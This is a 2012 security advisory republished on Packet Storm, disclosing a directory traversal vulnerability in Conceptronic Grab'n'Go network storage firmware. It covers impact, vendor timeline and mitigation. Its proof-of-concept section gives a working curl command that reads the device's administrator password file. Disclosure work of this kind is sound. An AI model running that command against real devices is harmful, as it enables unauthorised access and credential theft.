exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Conceptronic Grab'n'Go Network Storage Directory Traversal

Conceptronic Grab'n'Go Network Storage Directory Traversal
Posted Sep 3, 2012
Authored by Mattijs van Ommeren

Conceptronic Grab'n'Go Network Storage suffers from a directory traversal vulnerability.

tags | exploit
SHA-256 | 93cf477954aa7f9aeb590aa086ea47064b8af9b68d350d3199154a4f7a56457d

Conceptronic Grab'n'Go Network Storage Directory Traversal

Change Mirror Download
Security Advisory AA-003: Directory Traversal Vulnerability in Conceptronic Grab’n’Go Network Storage

Severity Rating: High
Discovery Date: July 29, 2012
Vendor Notification: July 30, 2012
Disclosure Date: September 3, 2012

Vulnerability Type=
Directory Traversal

Impact=
- System Access
- Exposure of sensitive information

Severity=
Alcyon rates the severity of this vulnerability as high due to the following properties:
- Ease of exploitation;
- No authentication credentials required;
- No knowledge about individual victims required;
- No interaction with the victim required;
- Number of Internet connected devices found.

Products and firmware versions affected=
- Conceptronic CH3ENAS firmware versions up to and including 3.0.12
- Conceptronic CH3HNAS firmware versions up to and including 2.4.13
- Possibly other rebranded Mapower network storage products

Risk Assessment=
An attacker can read arbitrary files, including the files that stores the administrative password.
This means an attacer could:
- Steal sensitive data stored on the device;
- Leverage the device to drop and/or host malware;
- Abuse the device to send spam through the victim’s Internet connection;
- Use the device as a pivot point to access locally connected systems or launch attacks directed to other systems.

Vulnerability=
The CGI-script that is responsible for showing the device logs is affected by a directory traversal vulnerability that

allows an attacker to view arbitrary files.

Proof of Concept Exploit=

curl "http://<victimIP>/cgi-bin/log.cgi?syslog&../../etc/sysconfig/config/webmaster.conf&Conceptronic2009"

Risk Mitigation=
At the time of disclosure no updated firmware version was available.
We recommend that you limit access to the devices's web management UI by utilizing proper packet filtering and/or NAT

on your router in order to limit network access to your NAS. Although this will not completely eliminate the risk of

exploitation, it becomes substantially more difficult to leverage a successful attack, because it would involve either

a compromise of another host on the victim’s local network or a client side attack that overcomes the Same Origin

Policy restrictions of the victim’s web browser.

Vendor Response=
- 2L/Conceptronic has declared on August 1 that it is not in their power to influence the manufacturer's patching

process
- Mapower, the manufacturer of the affected products, has contacted us on August 28 for details on reproducing the

issue on a CH3HNAS
- Mapower has confirmed on August 29 that they succesfully have reproduced the PoC exploit on a CH3HNAS and that they

are working on a fix

Fixed Versions=
- There is currently no vendor patch available.

=Latest version of this advisory
http://www.alcyon.nl/advisories/aa-003/


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close